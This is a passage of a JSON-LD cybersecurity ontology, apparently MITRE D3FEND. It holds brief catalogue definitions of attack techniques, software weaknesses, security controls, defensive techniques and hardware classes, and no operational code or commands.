      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-567",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-567",
      "d3f:definition": "The product does not properly synchronize shared data, such as static variables across threads, which can lead to undefined behavior and unpredictable data changes.",
      "rdfs:label": "Unsynchronized Access to Shared Data in a Multithreaded Context",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-820"
      }
    },
    {
      "@id": "d3f:ProbabilisticLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PL",
      "d3f:definition": "Probabilistic logic extends traditional logic truth tables with probabilistic expressions.",
      "d3f:kb-article": "## References\n1. Probabilistic logic. (2023, June 5). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Probabilistic_logic)",
      "rdfs:label": "Probabilistic Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicAI"
      }
    },
    {
      "@id": "d3f:T1452",
      "@type": "owl:Class",
      "d3f:attack-id": "T1452",
      "d3f:definition": "An adversary could use access to a compromised device's credentials to attempt to manipulate app store rankings or ratings by triggering application downloads or posting fake reviews of applications. This technique likely requires privileged access (a rooted or jailbroken device).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1643",
      "rdfs:label": "Manipulate App Store Rankings or Ratings - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1643"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Manipulate App Store Rankings or Ratings"
    },
    {
      "@id": "d3f:T0871",
      "@type": "owl:Class",
      "d3f:attack-id": "T0871",
      "d3f:definition": "Adversaries may attempt to leverage Application Program Interfaces (APIs) used for communication between control software and the hardware. Specific functionality is often coded into APIs which can be called by software to engage specific functions on a device or other software.",
      "rdfs:label": "Execution through API - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSExecutionTechnique"
      },
      "skos:prefLabel": "Execution through API"
    },
    {
      "@id": "d3f:Reference-SecurePLCCodingPracticesTop20List",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://plc-security.com/"
      },
      "d3f:kb-abstract": "The aim of this project is to provide guidelines to engineers that are creating software (ladder logic, function charts etc.) to help improve the security posture of Industrial Control Systems.\n\nThese practices leverage natively available functionality in the PLC/DCS. Little to no additional software tools or hardware is needed to implement these practices. They can all be fit into the normal PLC programming and operating workflow. More than security expertise, good knowledge of the PLCs to be protected, their logic, and the underlying process is needed for implementing these practices.\n\nTo fit the scope of the Top 20 Secure PLC Coding practices list, practices need to involve changes made directly to a PLC.",
      "d3f:kb-organization": "PLC Security",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ApplicationExceptionMonitoring"
        },
        {
          "@id": "d3f:ApplicationPerformanceMonitoring"
        },
        {
          "@id": "d3f:OTVariableAccessRestriction"
        },
        {
          "@id": "d3f:PlatformUptimeMonitoring"
        }
      ],
      "d3f:kb-reference-title": "Secure PLC Coding Practices: Top 20 List",
      "rdfs:label": "Reference - Secure PLC Coding Practices: Top 20 List"
    },
    {
      "@id": "d3f:T1055.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1055.003",
      "d3f:definition": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:invokes": {
        "@id": "d3f:SystemCall"
      },
      "d3f:may-add": {
        "@id": "d3f:ExecutableBinary"
      },
      "rdfs:label": "Thread Execution Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:N7679dbb13d6643eaac8a2ac221c786d6"
        },
        {
          "@id": "_:Nb7b7bde918cf46d3ad5cde7ffb554cce"
        }
      ]
    },
    {
      "@id": "_:N7679dbb13d6643eaac8a2ac221c786d6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "_:Nb7b7bde918cf46d3ad5cde7ffb554cce",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-add"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "d3f:AverageAbsoluteDeviation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AAD",
      "d3f:definition": "The average absolute deviation (AAD) of a data set is the average of the absolute deviations from a central point.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Average absolute deviation. [Link](https://en.wikipedia.org/wiki/Average_absolute_deviation)",
      "rdfs:label": "Average Absolute Deviation",
      "rdfs:subClassOf": {
        "@id": "d3f:Variability"
      }
    },
    {
      "@id": "d3f:ClientComputer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A client computer is a host that accesses a service made available by a server. The server is often (but not always) on another computer system, in which case the client accesses the service by way of a network.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Client_(computing)"
      },
      "rdfs:label": "Client Computer",
      "rdfs:seeAlso": {
        "@id": "dbr:Host_(network)"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:T1583.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583.007",
      "d3f:definition": "Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.",
      "rdfs:label": "Serverless",
      "rdfs:subClassOf": {
        "@id": "d3f:T1583"
      }
    },
    {
      "@id": "d3f:Reference-ThreatDetectionThroughTheAccumulatedDetectionOfThreatCharacteristics_SophosLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9104864B2/en?oq=US-9104864-B2"
      },
      "d3f:kb-abstract": "Embodiments of the present disclosure provide for improved capabilities in the detection of malware, where malware threats are detected through the accumulated identification of threat characteristics for targeted computer objects. Methods and systems include dynamic threat detection providing a first database that correlates a plurality of threat characteristics to a threat, wherein a presence of the plurality of the threat characteristics confirms a presence of the threat; detecting a change event in a computer run-time process; testing the change event for a presence of one or more of the plurality of characteristics upon detection of the change event; storing a detection of one of the plurality of characteristics in a second database that accumulates detected characteristics for the computer run-time process; and identifying the threat when each one of the plurality of characteristics appears in the second database.",
      "d3f:kb-author": "Clifford Penton; Irene Michlin",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Sophos Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessCodeSegmentVerification"
      },
      "d3f:kb-reference-title": "Threat detection through the accumulated detection of threat characteristics",
      "rdfs:label": "Reference - Threat detection through the accumulated detection of threat characteristics - Sophos Ltd"
    },
    {
      "@id": "d3f:T0858",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T0858",
      "d3f:definition": "Adversaries may change the operating mode of a controller to gain additional access to engineering functions such as Program Download.   Programmable controllers typically have several modes of operation that control the state of the user program and control access to the controllers API. Operating modes can be physically selected using a key switch on the face of the controller but may also be selected with calls to the controllers API. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below:",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:label": "Change Operating Mode - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKICSExecutionTechnique"
        },
        {
          "@id": "_:N2316c529ac4544fc9e26e70496feaafa"
        }
      ],
      "skos:prefLabel": "Change Operating Mode"
    },
    {
      "@id": "_:N2316c529ac4544fc9e26e70496feaafa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:Reference-ModelingUserAccessToComputerResources_DaedalusGroupLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8214364B2"
      },
      "d3f:kb-abstract": "Embodiments of the invention provide a method for detecting changes in behavior of authorized users of computer resources and reporting the detected changes to the relevant individuals. The method includes evaluating actions performed by each user against user behavioral models and business rules. As a result of the analysis, a subset of users may be identified and reported as having unusual or suspicious behavior. In response, the management may provide feedback indicating that the user behavior is due to the normal expected business needs or that the behavior warrants further review. The management feedback is available for use by machine learning algorithms to improve the analysis of user actions over time. Consequently, investigation of user actions regarding computer resources is facilitated and data loss is prevented more efficiently relative to the prior art approaches with only minimal disruption to the ongoing business processes.",
      "d3f:kb-author": "Joseph P. Bigus, Leon Gong, Christoph Lingenfelder",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Daedalus Group LLC (formerly IBM)",
      "d3f:kb-reference-of": {
        "@id": "d3f:ResourceAccessPatternAnalysis"
      },
      "d3f:kb-reference-title": "Modeling user access to computer resources",
      "rdfs:label": "Reference - Modeling user access to computer resources - Daedalus Group LLC (formerly IBM)"
    },
    {
      "@id": "d3f:FuzzyLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-FL",
      "d3f:definition": "Fuzzy logic is a form of many-valued logic in which the truth value of variables may be any real number between 0 and 1.",
      "d3f:kb-article": "## How it works\nIt is employed to handle the concept of partial truth, where the truth value may range between completely true and completely false.[1] By contrast, in Boolean logic, the truth values of variables may only be the integer values 0 or 1.\n\n## References\n1. Fuzzy logic. (2023, May 28). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Fuzzy_logic)",
      "rdfs:label": "Fuzzy Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicAI"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Metadata",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(6)"
    },
    {
      "@id": "d3f:CWE-550",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-550",
      "d3f:definition": "Certain conditions, such as network failure, will cause a server error message to be displayed.",
      "rdfs:label": "Server-generated Error Message Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-209"
      }
    },
    {
      "@id": "d3f:T1556.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1556.006",
      "d3f:definition": "Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.",
      "rdfs:label": "Multi-Factor Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:T1556"
      }
    },
    {
      "@id": "d3f:identifies",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x identifies y: The entity x recognizes or brings attention to entity y, making it distinct or clear through naming, description, or discovery.",
      "rdfs:label": "identifies",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CCI-002363_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides a logout capability for user-initiated communications sessions whenever authentication is used to gain access to organization-defined information resources.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ProcessTermination"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-26T00:00:00"
      },
      "rdfs:label": "CCI-002363"
    },
    {
      "@id": "d3f:T1547.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.006",
      "d3f:definition": "Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) ",
      "d3f:modifies": {
        "@id": "d3f:KernelModule"
      },
      "rdfs:label": "Kernel Modules and Extensions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:Naa46084a8ea04b68b7aeb962926d90c7"
        }
      ]
    },
    {
      "@id": "_:Naa46084a8ea04b68b7aeb962926d90c7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModule"
      }
    },
    {
      "@id": "d3f:AML.T0010.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0010.001",
      "d3f:definition": "Most AI systems rely on a limited set of AI frameworks.\nAn adversary could get access to a large number of AI systems through a comprise of one of their supply chains.\nMany AI projects also rely on other open source implementations of various algorithms.\nThese can also be compromised in a targeted way to get access to specific systems.",
      "rdfs:label": "AI Software - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0010.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0010"
      },
      "skos:prefLabel": "AI Software"
    },
    {
      "@id": "d3f:CWE-1427",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1427",
      "d3f:definition": "The product uses externally-provided data to build prompts provided to large language models (LLMs), but the way these prompts are constructed causes the LLM to fail to distinguish between user-supplied inputs and developer provided system directives.",
      "d3f:synonym": "prompt injection",
      "rdfs:label": "Improper Neutralization of Input Used for LLM Prompting",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-77"
      }
    },
    {
      "@id": "d3f:CWE-1076",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1076",
      "d3f:definition": "The product's architecture, source code, design, documentation, or other artifact does not follow required conventions.",
      "rdfs:label": "Insufficient Adherence to Expected Conventions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:erases",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x erases y: A technique x removes recorded data from storage device y creating space for new data.",
      "rdfs:label": "erases",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CCI-001368_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces approved authorizations for controlling the flow of information within the system based on organization-defined information flow control policies.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001368"
    },
    {
      "@id": "d3f:Harden",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DefensiveTactic"
      ],
      "d3f:definition": "The harden tactic is used to increase the opportunity cost of computer network exploitation. Hardening differs from Detection in that it generally is conducted before a system is online and operational.",
      "d3f:display-order": 0,
      "d3f:display-priority": 0,
      "rdfs:label": "Harden",
      "rdfs:subClassOf": {
        "@id": "d3f:DefensiveTactic"
      }
    },
    {
      "@id": "d3f:CWE-563",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-563",
      "d3f:definition": "The variable's value is assigned but never used, making it a dead store.",
      "d3f:synonym": "Unused Variable",
      "rdfs:label": "Assignment to Variable without Use",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1164"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-10_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Developer Configuration Management | Trusted Generation",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:FirmwareVerification"
      },
      "rdfs:label": "SA-10(4)"
    },
    {
      "@id": "d3f:T1143",
      "@type": "owl:Class",
      "d3f:attack-id": "T1143",
      "d3f:definition": "Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1564.003",
      "rdfs:label": "Hidden Window",
      "rdfs:seeAlso": {
        "@id": "d3f:T1564.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:OnboardComputer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:HardwareClock"
      },
      "d3f:definition": "A self-contained, embedded computing unit installed within a vehicle or other autonomous platform that executes real-time control, data-handling, and mission-management software. It interfaces directly with the platform's sensors, actuators, and communication links, processes and stores operational data, and issues commands to subsystems, enabling the system to function independently of external computing resources.",
      "d3f:may-contain": [
        {
          "@id": "d3f:FlashMemory"
        },
        {
          "@id": "d3f:HardwareWatchdogTimer"
        }
      ],
      "d3f:runs": [
        {
          "@id": "d3f:BootLoader"
        },
        {
          "@id": "d3f:FlightSoftware"
        },
        {
          "@id": "d3f:RealTimeOperatingSystem"
        }
      ],
      "d3f:synonym": "OBC",
      "rdfs:isDefinedBy": {
        "@id": "https://www.esa.int/Enabling_Support/Space_Engineering_Technology/Onboard_Computers_and_Data_Handling/Onboard_Computers"
      },
      "rdfs:label": "Onboard Computer",
      "rdfs:seeAlso": {
        "@id": "https://blog.satsearch.co/2020-03-11-an-overview-of-on-board-computer-obc-systems-available-on-the-global-space-marketplace"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEmbeddedComputer"
        },
        {
          "@id": "_:N39d2b33a6dc1487f8c75b1c1a5a18e18"
        },
        {
          "@id": "_:Nf48aa5acf4a24e309619d6eaccfead06"
        },
        {
          "@id": "_:N23280bcc2f2a465699c618d4dd04c034"
        },
        {
          "@id": "_:N525ca9b221564d03996c1453cb32b919"
        },
        {
          "@id": "_:Nbeb0ae8d292b4bb1ad18be16eb62089f"
        },
        {
          "@id": "_:N44a41581ed42447d97f4fc047fc867e9"
        }
      ]
    },
    {
      "@id": "_:N39d2b33a6dc1487f8c75b1c1a5a18e18",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareClock"
      }
    },
    {
      "@id": "_:Nf48aa5acf4a24e309619d6eaccfead06",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FlashMemory"
      }
    },
    {
      "@id": "_:N23280bcc2f2a465699c618d4dd04c034",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareWatchdogTimer"
      }
    },
    {
      "@id": "_:N525ca9b221564d03996c1453cb32b919",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootLoader"
      }
    },
    {
      "@id": "_:Nbeb0ae8d292b4bb1ad18be16eb62089f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FlightSoftware"
      }
    },
    {
      "@id": "_:N44a41581ed42447d97f4fc047fc867e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RealTimeOperatingSystem"
      }
    },
    {
      "@id": "d3f:ContentQuarantine",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContentQuarantine"
      ],
      "d3f:d3fend-id": "D3-CQ",
      "d3f:definition": "Transfer content that does not comply with policy to a quarantine zone.",
      "d3f:kb-article": "## How it works\n\nQuarantining serves as a protective measure to isolate potentially harmful files or elements until they can be safely analyzed or processed.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodForContentDisarmandReconstruction_OPSWATInc"
      },
      "d3f:quarantines": [
        {
          "@id": "d3f:DatabaseRecord"
        },
        {
          "@id": "d3f:File"
        }
      ],
      "rdfs:label": "Content Quarantine",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ContentFiltering"
        },
        {
          "@id": "_:N235a420d641f411782ce920d5a02e231"
        },
        {
          "@id": "_:N801484492473439cb48f472716cf13b1"
        }
      ]
    },
    {
      "@id": "_:N235a420d641f411782ce920d5a02e231",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:quarantines"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseRecord"
      }
    },
    {
      "@id": "_:N801484492473439cb48f472716cf13b1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:quarantines"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-772",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-772",
      "d3f:definition": "The product does not release a resource after its effective lifetime has ended, i.e., after the resource is no longer needed.",
      "rdfs:label": "Missing Release of Resource after Effective Lifetime",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-404"
      }
    },
    {
      "@id": "d3f:semantic-relation",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x semantic-relation y: The entity x is conceptually or meaningfully connected to entity y.",
      "rdfs:label": "semantic-relation",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Software-definedRadioConfiguration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The physical radio hardware parameters used by a software-defined radio (SDR), including center frequency, bandwidth, gain settings, antenna selection, ADC/DAC sample rates, filter characteristics, power output, and others.",
      "rdfs:label": "Software-defined Radio Configuration",
      "rdfs:seeAlso": {
        "@id": "https://www.analog.com/media/en/training-seminars/design-handbooks/Software-Defined-Radio-for-Engineers-2018/SDR4Engineers.pdf"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDeviceConfiguration"
      }
    },
    {
      "@id": "d3f:CCI-002890_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to protect the integrity of nonlocal maintenance and diagnostic communications.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-22T00:00:00"
      },
      "rdfs:label": "CCI-002890"
    },
    {
      "@id": "d3f:Transceiver",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:Receiver"
        },
        {
          "@id": "d3f:Transmitter"
        }
      ],
      "d3f:definition": "A transceiver is a device that contains both a transmitter and receiver.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.analog.com/en/resources/glossary/transceiver.html"
      },
      "rdfs:label": "Transceiver",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:N482d0e0851d747268fed078c58fdc039"
        },
        {
          "@id": "_:N532599ede4224f6885f1ec3c0a3d7398"
        }
      ]
    },
    {
      "@id": "_:N482d0e0851d747268fed078c58fdc039",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Receiver"
      }
    },
    {
      "@id": "_:N532599ede4224f6885f1ec3c0a3d7398",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Transmitter"
      }
    },
    {
      "@id": "d3f:CWE-276",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-276",
      "d3f:definition": "During installation, installed file permissions are set to allow anyone to modify those files.",
      "d3f:weakness-of": {
        "@id": "d3f:ApplicationInstaller"
      },
      "rdfs:label": "Incorrect Default Permissions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-732"
        },
        {
          "@id": "_:Nc8fd26a6a54a46ff80c65f6dd1e583c8"
        }
      ]
    },
    {
      "@id": "_:Nc8fd26a6a54a46ff80c65f6dd1e583c8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationInstaller"
      }
    },
    {
      "@id": "d3f:EXF-0005",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0005",
      "d3f:definition": "A nearby vehicle serves as the collection platform for unintended emissions and other proximate signals, effectively a mobile TEMPEST/EMSEC sensor. From close range, the adversary measures near-field RF, conducted/structure-borne emissions, optical/IR signatures, or leaked crosslink traffic correlated with on-board activity, then decodes or models those signals to recover information (keys, tables, procedure execution, payload content). Proximity also enables directional gain and repeated sampling passes, turning weak side channels into usable exfiltration without engaging the victim’s logical interfaces.",
      "rdfs:label": "Proximity Operations - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0005/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Proximity Operations"
    },
    {
      "@id": "d3f:Client-serverPayloadProfiling",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Client-serverPayloadProfiling"
      ],
      "d3f:analyzes": {
        "@id": "d3f:NetworkTraffic"
      },
      "d3f:d3fend-id": "D3-CSPP",
      "d3f:definition": "Comparing client-server request and response payloads to a baseline profile to identify outliers.",
      "d3f:kb-article": "## How it works\nProfiling request and response payloads across multiple clients to a single server to develop a baseline of their characteristics. May take into account request/response sizes, entropy, frequency, and rhythm. Finally, identify outliers as they may indicate a malicious payload delivery and subsequent server exploitation.\n\n\n## Considerations\n* Collecting metrics to establish a profile can be challenging since user behavior can change easily.\n* Employees may work different hours or inconsistent schedules which will cause false positives.\n* Collection of network activity to generate metrics is a computationally intensive process.\n* Users may log into different workstations which may cause false positives.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodAndSystemForDetectingMaliciousPayloads_VectraNetworksInc"
      },
      "rdfs:label": "Client-server Payload Profiling",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N7ba19ace775341feb92f69826755ffe7"
        }
      ]
    },
    {
      "@id": "_:N7ba19ace775341feb92f69826755ffe7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:IA-0009",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0009",
      "d3f:definition": "Adversaries obtain first execution by riding connections that the mission already trusts, formal interconnections with partners, vendors, and user communities. Once a third party is compromised, the actor inherits that entity’s approved routes into mission enclaves: VPNs and jump hosts into ground networks, API keys into cloud tenants, automated file drops that feed command or update pipelines, and collaboration spaces where procedures and dictionaries circulate. Because traffic, credentials, and artifacts originate from known counterparts, the initial execution event can appear as a routine payload task, scheduled procedure, or software update promoted through established processes.",
      "rdfs:label": "Trusted Relationship - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0009/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Trusted Relationship"
    },
    {
      "@id": "d3f:T1218.015",
      "@type": "owl:Class",
      "d3f:attack-id": "T1218.015",
      "d3f:definition": "Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams.(Citation: Electron 2) Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS.(Citation: Electron 3) The Chromium engine is used to display web content and Node.js runs the backend code.(Citation: Electron 1)",
      "rdfs:label": "Electron Applications",
      "rdfs:subClassOf": {
        "@id": "d3f:T1218"
      }
    },
    {
      "@id": "d3f:T1656",
      "@type": "owl:Class",
      "d3f:attack-id": "T1656",
      "d3f:definition": "Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary’s ultimate goals, possibly against multiple victims.",
      "rdfs:label": "Impersonation",
      "rdfs:subClassOf": {
